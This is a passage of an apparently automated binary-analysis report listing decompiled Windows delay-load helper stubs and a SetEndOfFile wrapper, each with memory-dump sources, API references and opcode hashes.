				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab6c, 0xdadf04); // executed
				goto __eax;
			}








              0x00d8d1ae
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 90511cf31c4ad3fb2d202dc7b47d1df37195d7eba9c0de408e98fb76c21f8d59
              • Instruction ID: dbe7f6e53b684df8ae4cfacfb4ac993aaf45e54b4f92bfd53e885bddc07eb6d1
              • Opcode Fuzzy Hash: 90511cf31c4ad3fb2d202dc7b47d1df37195d7eba9c0de408e98fb76c21f8d59
              • Instruction Fuzzy Hash: FAB01281358100AC310972096D06C3B330FC9C3F14330855BF006C11C0E4618C050232
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1C9, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab6c, 0xdadf0c); // executed
				goto __eax;
			}








              0x00d8d1ae
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: db4c7c2f8be7e2bcc891324cb01ce6cbdea25dedfdc1dd7a8c33d9e8582c5ce9
              • Instruction ID: a87a875967765a4b47a9f0c5b2f85a267ef242ac153139560dbb943dfde9f98a
              • Opcode Fuzzy Hash: db4c7c2f8be7e2bcc891324cb01ce6cbdea25dedfdc1dd7a8c33d9e8582c5ce9
              • Instruction Fuzzy Hash: 21B01281358100AC310972096C06C3B331FC9C3F14330C55BF406C11C0E5608C040232
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1BF, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab6c, 0xdadf10); // executed
				goto __eax;
			}








              0x00d8d1ae
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f287270127fa51f0265b13e616b015ce67aea9a2fc7192c566acd4bda622b357
              • Instruction ID: 441e27e82bc750d749621b2c6dee2e7ec0909ace6ae122a6ca698f986f1e0f75
              • Opcode Fuzzy Hash: f287270127fa51f0265b13e616b015ce67aea9a2fc7192c566acd4bda622b357
              • Instruction Fuzzy Hash: 41B01281398100AC310972096C06C3B331FD9C3F14330895BF006C01C8D4608C040232
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1A4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab6c, 0xdadf08); // executed
				goto __eax;
			}








              0x00d8d1ae
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 62bef4d20147f16eb5db1056b26a2925b3dcb48c230d065b2812d3cd327b14aa
              • Instruction ID: e08dea8e65b2724d8f477872335d8c42df846056e82b13ed8be1190ed2a8eaec
              • Opcode Fuzzy Hash: 62bef4d20147f16eb5db1056b26a2925b3dcb48c230d065b2812d3cd327b14aa
              • Instruction Fuzzy Hash: B6B01281398200BC31093205ED06C3B330FCAC3F14330865BF042C04C0A4608C440132
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D205, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D205() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab8c, 0xdadff8); // executed
				goto __eax;
			}








              0x00d8d20f
              0x00d8d217
              0x00d8d21e

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D217
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a37c5577a5d1573a66e9a489f2165e7da60a3796c91c1c944811800a9889f221
              • Instruction ID: 6ea6e68e09cd9a5b488d75381c8d9686770074ac8f56f5bc78eae12f920024f0
              • Opcode Fuzzy Hash: a37c5577a5d1573a66e9a489f2165e7da60a3796c91c1c944811800a9889f221
              • Instruction Fuzzy Hash: 4EB012C6299100BC310931496C02E37330FD5C7F28330866BF012C40C49840CC440132
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D23E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D23E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab8c, 0xdadff0); // executed
				goto __eax;
			}








              0x00d8d20f
              0x00d8d217
              0x00d8d21e

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D217
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f0c5560750a7d89c2a37e21b41cb87dcf344f26d9e7e30fa1472577fda9278fa
              • Instruction ID: 512ddd56114769c4988d5f339982992610fd0219555a35a5a0ff3eed641966c2
              • Opcode Fuzzy Hash: f0c5560750a7d89c2a37e21b41cb87dcf344f26d9e7e30fa1472577fda9278fa
              • Instruction Fuzzy Hash: C3B012C6299000AC3109714D6C02F37230FE4CBF28330856BF006C51C4D840CC040232
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D234, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D234() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaab8c, 0xdadffc); // executed
				goto __eax;
			}








              0x00d8d20f
              0x00d8d217
              0x00d8d21e

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D217
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9a453a6e6d060e97ae5bd6e82d9730760395fb2a9bbe6cd60588f5eeb5c91d6c
              • Instruction ID: 37031eaa38d2aa01ce9984efc1d8c6c3a65de870ed6a20e31809981017ad3bca
              • Opcode Fuzzy Hash: 9a453a6e6d060e97ae5bd6e82d9730760395fb2a9bbe6cd60588f5eeb5c91d6c
              • Instruction Fuzzy Hash: 4CB012C6299010AC3109714D6C02F37230FD4CBF28330C56BF406C55C0D940CC040232
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D7DA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00D8D53A(_t3, _t4, _t8, _t9, _t10, 0xdaabcc, 0xdadeb4); // executed
				goto __eax;
			}








              0x00d8d7e4
              0x00d8d7ec
              0x00d8d7f3

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D7EC
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e0e08fa17a1a5c1c2c77b56c57eba70a7c317bbed3d764c5fc1d94d33c21707b
              • Instruction ID: 24423102032d47b44f976070aa8a932cca0be225595bea58fab2ee526e9cc016
              • Opcode Fuzzy Hash: e0e08fa17a1a5c1c2c77b56c57eba70a7c317bbed3d764c5fc1d94d33c21707b
              • Instruction Fuzzy Hash: C7B01281258001FD320971056E02C36330FC0D3F1C330C55BF042C40C09441DD054232
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1D8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 22%
              			E00D8D1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xdaab6c); // executed
				E00D8D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








              0x00d8d1b1
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8d971ab01edc9f39412b993dfe7540a143662cd9e71a6a74b096dac3fff62d15
              • Instruction ID: 36a7a3419417f9c7e4a57ce42b09ce592e9e15d0e4c31da01f6c867b48705968
              • Opcode Fuzzy Hash: 8d971ab01edc9f39412b993dfe7540a143662cd9e71a6a74b096dac3fff62d15
              • Instruction Fuzzy Hash: 1CA001966A9202BC310A7256AD0AC3A331ED9C7F693708A9AF446840C5A9A199495236
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1F6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 22%
              			E00D8D1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xdaab6c); // executed
				E00D8D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








              0x00d8d1b1
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 36babbd796709b54e7608350b2f903f8d11ea9be26323243d32f021c6571d71c
              • Instruction ID: 36a7a3419417f9c7e4a57ce42b09ce592e9e15d0e4c31da01f6c867b48705968
              • Opcode Fuzzy Hash: 36babbd796709b54e7608350b2f903f8d11ea9be26323243d32f021c6571d71c
              • Instruction Fuzzy Hash: 1CA001966A9202BC310A7256AD0AC3A331ED9C7F693708A9AF446840C5A9A199495236
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1EC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 22%
              			E00D8D1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xdaab6c); // executed
				E00D8D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








              0x00d8d1b1
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ab47cc1ff6a743beeb7761f3857d0901612d67289e6f9279ad7a85f937bb5a4f
              • Instruction ID: 36a7a3419417f9c7e4a57ce42b09ce592e9e15d0e4c31da01f6c867b48705968
              • Opcode Fuzzy Hash: ab47cc1ff6a743beeb7761f3857d0901612d67289e6f9279ad7a85f937bb5a4f
              • Instruction Fuzzy Hash: 1CA001966A9202BC310A7256AD0AC3A331ED9C7F693708A9AF446840C5A9A199495236
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D200, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 22%
              			E00D8D200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xdaab6c); // executed
				E00D8D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








              0x00d8d1b1
              0x00d8d1b6
              0x00d8d1bd

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D1B6
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b3fd5326e86fc3d9a5366a953b47c6578726fe14fff80e6c2b1eb664c82e22a3
              • Instruction ID: 36a7a3419417f9c7e4a57ce42b09ce592e9e15d0e4c31da01f6c867b48705968
              • Opcode Fuzzy Hash: b3fd5326e86fc3d9a5366a953b47c6578726fe14fff80e6c2b1eb664c82e22a3
              • Instruction Fuzzy Hash: 1CA001966A9202BC310A7256AD0AC3A331ED9C7F693708A9AF446840C5A9A199495236
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D22F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 22%
              			E00D8D22F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xdaab8c); // executed
				E00D8D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








              0x00d8d212
              0x00d8d217
              0x00d8d21e

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D217
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0740211ccd4c66207a44ca684b4c206a9042ef4c89e8a89d3e64ae6e169922df
              • Instruction ID: d6cea67a6615398acd65d7984f995070195e6153815c4e06859d6c5a600b2598
              • Opcode Fuzzy Hash: 0740211ccd4c66207a44ca684b4c206a9042ef4c89e8a89d3e64ae6e169922df
              • Instruction Fuzzy Hash: DFA012C6198001BC300931456C02E36130EC0C7F24330895AF001840C058408C040131
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D225, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 22%
              			E00D8D225() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xdaab8c); // executed
				E00D8D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








              0x00d8d212
              0x00d8d217
              0x00d8d21e

              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D8D217
                • Part of subcall function 00D8D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8D5B7
                • Part of subcall function 00D8D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8D5C8
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 833461ea0060d5ceae6d815d8eac671d5ef892b2dc734d303370008cb02efaa3
              • Instruction ID: d6cea67a6615398acd65d7984f995070195e6153815c4e06859d6c5a600b2598
              • Opcode Fuzzy Hash: 833461ea0060d5ceae6d815d8eac671d5ef892b2dc734d303370008cb02efaa3
              • Instruction Fuzzy Hash: DFA012C6198001BC300931456C02E36130EC0C7F24330895AF001840C058408C040131
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79BD6, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D79BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}




              0x00d79bd9
              0x00d79be2
              0x00d79be5

              APIs
              • SetEndOfFile.KERNELBASE(?,00D78F33,?,?,-00001960), ref: 00D79BD9
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: ad7af1c5e59e7dcaf88e64e3eb2dbc5e53330f84210e9f398777345010867ec4
              • Instruction ID: 0cb77788bb7b412bd28430188214fe099445133b8ae87748543ec1d748b5d820
              • Opcode Fuzzy Hash: ad7af1c5e59e7dcaf88e64e3eb2dbc5e53330f84210e9f398777345010867ec4
              • Instruction Fuzzy Hash: 5AB011300A000A8A8E002B38CC088283A22EA2230A30082A0A002CA0A0CB22C003AA00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89A8D, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
